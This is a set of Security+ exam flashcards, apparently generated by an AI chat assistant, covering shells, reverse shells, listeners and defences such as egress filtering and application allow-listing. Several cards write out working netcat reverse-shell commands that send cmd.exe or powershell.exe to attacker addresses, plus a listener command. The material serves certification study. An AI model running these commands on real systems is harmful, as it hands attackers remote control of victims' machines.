cybersec+ shells

Of course. Here is a set of flashcards focusing specifically on the key terms from the study material.

Flashcards: Key Terms

Front:

Reverse Shell

Back:

A remote shell session initiated from the victim's computer back to the attacker's listening server. This technique helps bypass firewalls by making the connection appear as legitimate outbound traffic.

Front:

Listener

Back:

A program or command an attacker runs on their own server to wait for an incoming connection from a victim's payload, typically to catch a reverse shell. (e.g., nc -lvp 443).

Front:

Payload / Stager

Back:

The malicious code or script executed on a victim's machine that initiates the connection back to the attacker's listener to establish a remote shell.

Front:

Netcat (nc)

Back:

A versatile command-line networking utility used to read from and write to network connections. It is a common tool for creating listeners and executing reverse shell payloads.

Front:

Egress Filtering

Back:

A network security control that restricts or blocks outbound traffic leaving an internal network. It's a key defense against reverse shells by preventing connections to unauthorized external ports and IP addresses.

Front:

Application Allow-listing

Back:

A security policy that explicitly defines which programs are allowed to run on a system. Any application not on the list is blocked, preventing the execution of unauthorized tools like nc.exe.

Front:

PowerShell

Back:

An advanced, object-oriented command-line shell and scripting language for Windows. It is heavily used in system administration and security for automation and management.

Front:

cron

Back:

A time-based job scheduler in Unix-like operating systems. It is used to automate and schedule the execution of scripts or commands at specific intervals, which can be used to maintain persistence for a backdoor.

Front:

Metasploit Framework

Back:

A popular open-source penetration testing framework used to discover, exploit, and validate vulnerabilities. It includes numerous tools for generating reverse shell payloads.

Front:

Cobalt Strike

Back:

A commercial threat emulation software platform used by red teams for advanced adversary simulations. It is a powerful command-and-control (C2) framework known for its sophisticated reverse shell capabilities.

Front:

Stateful Firewall

Back:

A firewall that tracks the state of active network connections. Because it automatically allows return traffic for connections initiated from inside the network, it can be bypassed by a reverse shell.

Front:

EDR / NGAV

Back:

Endpoint Detection and Response / Next-Generation Antivirus. Advanced endpoint security solutions that use behavioral analysis, memory scanning, and script-blocking to identify and stop threats like fileless malware and reverse shells.

Of course. Here are the flashcards based on the provided notes for the CompTIA Security+ (SY0-701) exam.

Set 1: Key Concepts

Front:

What are common command-line environments (“shells”) you should know for Security+?

Back:

* Windows CMD: The traditional command-line interpreter.

* PowerShell: A more powerful, object-oriented shell for Windows.

* Linux Shells: Such as bash (most common) and zsh.

* Python Interactive Shell: For running Python commands and scripts.

Front:

For Security+, why is scripting in shells considered a crucial skill?

Back:

Scripting allows you to automate security tasks. Any command you can type can be put into a script and scheduled (using Task Scheduler or cron). This is essential for tasks like forcing updates, gathering inventories, rotating logs, and pulling indicators of compromise.

Front:

What is a reverse shell?

Back:

A remote shell session that is initiated from the victim's computer back to the attacker's machine. This technique is often used to bypass firewalls, as the outbound connection can be disguised as normal network traffic (e.g., on TCP port 443 for HTTPS).

Front:

What are some common tools used to create and manage reverse shells?

Back:

* Netcat (nc): A versatile networking utility.

* Metasploit Framework: A comprehensive penetration testing tool.

* Cobalt Strike: A popular command-and-control (C2) framework.

* Custom Python/Go executables: Often used by adversaries to evade detection.

Front:

What are the primary security implications of a reverse shell on a network?

Back:

A reverse shell can serve as a persistent backdoor or foothold for an Advanced Persistent Threat (APT). This allows an attacker to re-enter the network at will, create rogue user accounts, pivot to other internal systems, and exfiltrate sensitive data.

Set 2: Technical Details & Defense

Front:

In a reverse shell scenario, what is the difference between the "listener" and the "payload"?

Back:

* Listener: The attacker sets this up on their own machine to "listen" for an incoming connection on a specific port (e.g., nc -lvp 443).

* Payload/Stager: This is the malicious code run on the victim's machine that initiates the connection back to the attacker's listener.

Front:

What is the Netcat (nc) command to make a Windows victim connect to an attacker at 10.10.10.5 on port 443 and send a command shell?

Back:

nc 10.10.10.5 443 -e cmd.exe

Front:

Name at least three mitigating controls to defend against reverse shells.

Back:

* EDR/NGAV: Endpoint protection that can perform script-block and memory scanning.

* Egress Filtering: Restricting which outbound ports and destinations internal hosts can connect to.

* Application Allow-listing: Preventing unauthorized executables (like nc.exe) from running.

* PowerShell Constrained Language Mode: Restricting dangerous cmdlets and commands.

Front:

Which PowerShell cmdlet is used to view the list of running processes on a Windows host?

Back:

Get-Process

Set 3: Exam Practice

Front:

Question: Why do attackers often use TCP port 443 for their reverse shell traffic?

Back:

To blend in with normal HTTPS traffic, making the malicious connection harder for firewalls and security analysts to detect.

Front:

Question: An analyst sees the process nc.exe -d 203.0.113.77 443 -e powershell.exe running on a host. Which preventive control would have been most effective at stopping this?

Back:

Application Allow-listing (e.g., AppLocker), because it would have prevented the unauthorized nc.exe program from executing in the first place.

Front:

PBQ Scenario: You suspect a malicious Python script (pyrev.py) is maintaining a reverse shell on a Linux server. What is a three-step process (with commands) to handle this threat?

Back:

* Identify Process: Find the Process ID (PID) of the script.

* ps aux | grep pyrev.py

* Confirm Connection: Verify it has an outbound network connection.

* lsof -Pan -p <PID> -i or ss -pnen | grep <PID>

* Kill & Remove: Terminate the process and remove the malicious file.

* kill -9 <PID>

* rm /path/to/pyrev.py